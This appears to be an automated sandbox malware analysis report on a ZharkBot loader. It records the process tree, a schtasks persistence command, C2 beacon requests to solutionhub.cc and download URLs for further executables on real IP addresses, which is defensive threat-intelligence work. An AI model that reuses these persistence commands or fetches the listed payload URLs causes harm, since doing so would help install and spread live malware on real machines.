Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 25, 2024, 8:48 a.m.	July 25, 2024, 8:59 a.m.

Size	324.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`848abdbd09c052799a0e0180b59f6fee`
SHA256	`1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109`
CRC32	`C205C55E`
ssdeep	`6144:/DiElZeVJ9/+pPQHe5wocklXck9UBd4MvQhdaAadaH8CaTnlmIa+w4Iqr6KGus24:/DiETMgqkKBJm5+fnHYftcv7vQG6zIs`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

lobo.exe "C:\Users\test22\AppData\Local\Temp\lobo.exe"
1696
- schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" /F
  2108
- explert.exe "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe"
  2220
  - schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" /F
    2276
  - FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
    2468
    - cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10 & exit
      2696
      - timeout.exe timeout 10
        2804
    - cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10 & exit
      2184
      - timeout.exe timeout 10
        2264
  - RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    2936
  - HM3SOlbpH71yEXUIEAOeIiGX.exe "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
    3012

Name	Response	Post-Analysis Lookup
solutionhub.cc	A 172.67.128.126 A 104.21.2.10	172.67.128.126

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.128.126	Active	Moloch
185.196.10.57	Active	Moloch
185.216.214.218	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2054416	ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)	A Network Trojan was detected
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 172.67.128.126:443	2054418	ET MALWARE Observed ZharkBot Domain (solutionhub .cc in TLS SNI)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 172.67.128.126:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 185.196.10.57:80	2054413	ET MALWARE ZharkBot User-Agent Observed	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 185.196.10.57:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 172.67.128.126:443	2054418	ET MALWARE Observed ZharkBot Domain (solutionhub .cc in TLS SNI)	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 172.67.128.126:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.196.10.57:80 -> 192.168.56.103:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.10.57:80 -> 192.168.56.103:49166	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 185.216.214.218:80	2054413	ET MALWARE ZharkBot User-Agent Observed	A Network Trojan was detected
TCP 192.168.56.103:49169 -> 185.216.214.218:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.216.214.218:80 -> 192.168.56.103:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.216.214.218:80 -> 192.168.56.103:49169	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 185.196.10.57:80	2054413	ET MALWARE ZharkBot User-Agent Observed	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 185.196.10.57:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.196.10.57:80 -> 192.168.56.103:49170	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.10.57:80 -> 192.168.56.103:49170	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 185.196.10.57:80	2054413	ET MALWARE ZharkBot User-Agent Observed	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 185.196.10.57:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.196.10.57:80 -> 192.168.56.103:49170	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49165 172.67.128.126:443	C=US, O=Google Trust Services, CN=WE1	CN=solutionhub.cc	95:e3:33:ac:ac:3e:7c:88:2a:80:ec:a7:59:c6:13:67:fc:5c:69:3d
TLSv1 192.168.56.103:49167 172.67.128.126:443	C=US, O=Google Trust Services, CN=WE1	CN=solutionhub.cc	95:e3:33:ac:ac:3e:7c:88:2a:80:ec:a7:59:c6:13:67:fc:5c:69:3d

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameA July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2024, 8:48 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 25, 2024, 8:49 a.m.			0	0
IsDebuggerPresent July 25, 2024, 8:49 a.m.			0	0
IsDebuggerPresent July 25, 2024, 8:49 a.m.			0	0
IsDebuggerPresent July 25, 2024, 8:49 a.m.			0	0

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 25, 2024, 8:48 a.m.	buffer: SUCCESS: The scheduled task "explert.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 25, 2024, 8:48 a.m.	buffer: SUCCESS: The scheduled task "explert.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 25, 2024, 8:49 a.m.	buffer: Waiting for 10 console_handle: 0x0000000000000007	1	1
WriteConsoleW July 25, 2024, 8:49 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x0000000000000007	1	1
WriteConsoleW July 25, 2024, 8:49 a.m.	buffer: Waiting for 10 console_handle: 0x0000000000000007	1	1
WriteConsoleW July 25, 2024, 8:49 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x0000000000000007	1	1

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey July 25, 2024, 8:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000087ab30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2024, 8:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000087ab30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2024, 8:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000087ab30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 25, 2024, 8:49 a.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 25, 2024, 8:49 a.m.	stacktrace: 0x1c2d0005 0x85bd00 0x1c2d0000 exception.instruction_r: 3b b9 17 00 65 40 e2 18 3a 80 c8 e5 cc 2d 8c 31 exception.instruction: cmp edi, dword ptr [rcx + 0x40650017] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x1c2d0005 registers.r14: 0 registers.r15: 6220882 registers.rcx: 87 registers.rsi: 0 registers.r10: 3221225714 registers.rbx: 8764672 registers.rsp: 6220696 registers.r11: 6220640 registers.r8: 2003566592 registers.r9: 816 registers.rdx: 0 registers.r12: 6221062 registers.rbp: 472711168 registers.rdi: 0 registers.rax: 0 registers.r13: 8575824	1	0	0
__exception__ July 25, 2024, 8:49 a.m.	stacktrace: DllGetClassObjectInternal+0x12b4c CorDllMainForThunk-0x799af clr+0xd7bc5 @ 0x72fb7bc5 DllGetClassObjectInternal+0x1357d CorDllMainForThunk-0x78f7e clr+0xd85f6 @ 0x72fb85f6 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72f57d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72f57dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72f57e88 IEE+0x7326 GetCLRFunction-0x3a3 clr+0xc41c6 @ 0x72fa41c6 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72ffa0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 00 00 7b 4c 01 00 00 00 00 00 00 00 00 00 2a 00 exception.instruction: add byte ptr [eax], al exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd7ee registers.esp: 74250700 registers.edi: 3 registers.eax: 12 registers.ebp: 74250760 registers.edx: 0 registers.ebx: 74250728 registers.esi: 0 registers.ecx: 3	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://185.196.10.57/selectex-file-host/Tgnviazinc.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.216.214.218/Population.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.196.10.57/selectex-file-host/linkedin.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.196.10.57/selectex-file-host/acev.exe

Performs some HTTP requests (9 events)

request	GET http://185.196.10.57/selectex-file-host/Tgnviazinc.exe
request	GET http://185.216.214.218/Population.exe
request	GET http://185.196.10.57/selectex-file-host/linkedin.exe
request	GET http://185.196.10.57/selectex-file-host/acev.exe
request	GET https://solutionhub.cc/socket/?id=08CA843D0A15D2560E8FA7EE94E71AC9B38318DF02721EA26194DF153A2BEEA0&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=1CC68878051DC553418AD7
request	GET https://solutionhub.cc/socket/?id=08CA843D0A15D2560E8FA7EE94E71AC9B38318DF02721EA26194DF153A2BEEA0&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=1CC68878051DC553418AD7&tsk=5C9F
request	GET https://solutionhub.cc/socket/?id=08CA843D0A15D2560E8FA7EE94E71AC9B38318DF02721EA26194DF153A2BEEA0&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=1CC68878051DC553418AD7&tsk=5F90
request	GET https://solutionhub.cc/socket/?id=08CA843D0A15D2560E8FA7EE94E71AC9B38318DF02721EA26194DF153A2BEEA0&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=1CC68878051DC553418AD7&tsk=5F91
request	GET https://solutionhub.cc/socket/?id=08CA843D0A15D2560E8FA7EE94E71AC9B38318DF02721EA26194DF153A2BEEA0&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=1CC68878051DC553418AD7&tsk=5D

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

solutionhub.cc

description

Cocos Islands domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 76 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000af0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000025a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3324000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93b7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93b8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93c2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93c56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93b7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ca1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93bcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93b9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ca2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ca3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ca4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000776eb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

explert.exe tried to sleep 230 seconds, actually delayed analysis time by 230 seconds

Creates executable files on the filesystem (4 events)

file	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
file	C:\Users\test22\AppData\Roaming\d3d9.dll
file	C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
